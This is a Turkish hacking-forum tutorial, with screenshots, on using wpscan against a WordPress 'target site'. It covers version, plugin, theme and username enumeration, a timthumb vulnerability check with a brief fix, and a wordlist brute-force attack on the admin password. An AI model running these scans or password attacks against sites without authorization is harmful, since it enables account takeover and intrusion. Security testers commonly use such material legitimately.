Wordpress Açık Tarama [wpscan]

Raphers

Adanmış Üye
31 Ağu 2014
7,286
5
System.Net
[FONT=Courier New, Courier, mono]Merhabalar, bu konumuzda “wpscan” ile Wordpress sitelerindeki açıkları tarayacağız.
Konuyu resimli anlatmayı tercih ettim hiç bilgisi olmayan arkadaşlarımızda anlayabilsin diye başlayalım…
[/FONT]

[FONT=Courier New, Courier, mono]“Kali Linux >Web Applications > Web Vulnerability Scanners>wpscan”yolunu izleyerek komut penceremizi çalıştıralım.
[/FONT]

vwhxb.png



[FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org”sitenin versiyon,tema,plugin bilgilerini verir.
[/FONT]

vwhxq.png


vwhxu.png


[FONT=Times New Roman, Times, serif]Plugin Açıkları Tarama[/FONT]

[FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org --enumerate p” Hedef sitedeki
pluginleri tarar ve Açıklarını verir.
[/FONT]

[FONT=Courier New, Courier, mono]Tarama tamamlandıktan sonra sonuca bakıyoruz.

[FONT=Arial, Helvetica, sans-serif]Açık tesbit edilmeyen pluginler.[/FONT]

vwhyz.png


vwhz1.png


[FONT=Arial, Helvetica, sans-serif]Açığı tesbit edilen pluginler .[/FONT]

vwj02.png


vwj05.png


[FONT=Times New Roman, Times, serif]Kullanıcı Adları Tarama
[/FONT]

[FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org --enumerate u”Bu komutumuz ile hedef sitedeki users yani kullanıcı adlarını çekiyoruz.
[/FONT]


vwj0r.png


[FONT=Times New Roman, Times, serif]Tema Açıkları Tarama[/FONT]

[FONT=Courier New, Courier, mono]Sırdaki komutumuz[/FONT][FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org --enumerate t”
Bu komut ile hedef sitedeki tema açıklarını tesbit ederiz.[/FONT]

vwj13.png


vwj16.png


[FONT=Times New Roman, Times, serif]Timthumb Açığı Tarama[/FONT]

[FONT=Courier New, Courier, mono]Önce “timthumb” açığından bahsedeyim kısaca wordpress tema ve eklentilerindeki resimleri boyutlandırmaya yarıyan “timthumb.php” dosyası çok kullanışlı olduğu için birçok site tarafından kullanılır.[/FONT]

[FONT=Courier New, Courier, mono]“timthumb.php” dosyasý içerisinde bulunan aşağıdaki kodlar flickr,picasa,blogger,wordpress vb. sitelerden resim çekebilmek için konulmuştur.İşte bu kod satırı kullanıldığında hedef site için büyük tehlike oluşturur.
[/FONT]


[FONT=Courier New, Courier, mono]?
$allowedSites = array (
‘flickr.com’,
‘picasa.com’,
‘blogger.com’,
‘wordpress.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
‘photobucket.com’,

);[/FONT]

[FONT=Courier New, Courier, mono][FONT=Arial, Helvetica, sans-serif]Not:[/FONT]Açığı Kapatmak İçin“timthumb.php”dosyası içindeki $allowedSites = array ( kısmı $allowedSites = array ( ); olarak düzeltildiğinde başka sitelere yazma izni kapanmış olur. Tüm dosya içinde düzeltilmesi gerekir.


[FONT=Courier New, Courier, mono]Şimdi işlemimize devam edelim “timthumb” açığını hedef site üzerinde taratıp mevcut olup olmadığına bakalım.[/FONT]

[FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org --enumerate tt” komutu ile taratıyoruz.[/FONT]

vwj2b.png


[FONT=Courier New, Courier, mono]Hedef site üzerinde “timthumb” açığı mevcut.

vwj2m.png


[FONT=Times New Roman, Times, serif]Tesbit Edilen Kullanıcı Adı ile Brute Force Attack
[/FONT]

[FONT=Courier New, Courier, mono]“wpscan ./wpscan.rb --url www.hedefsite.org --wordlist wrdlst.txt --username admin”Komutu ile hedef sitede tesbit ettiğimiz kullanıcı adının şifresini “brute force attack”ile kırmayı dener ve bize sonucu bildirir.
[/FONT]

vwj3q.png


[FONT=Courier New, Courier, mono]Sonucu bize aşağıdaki gibi bildirir.[/FONT]

vwj3y.png
[/FONT]
[/FONT][/FONT]
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.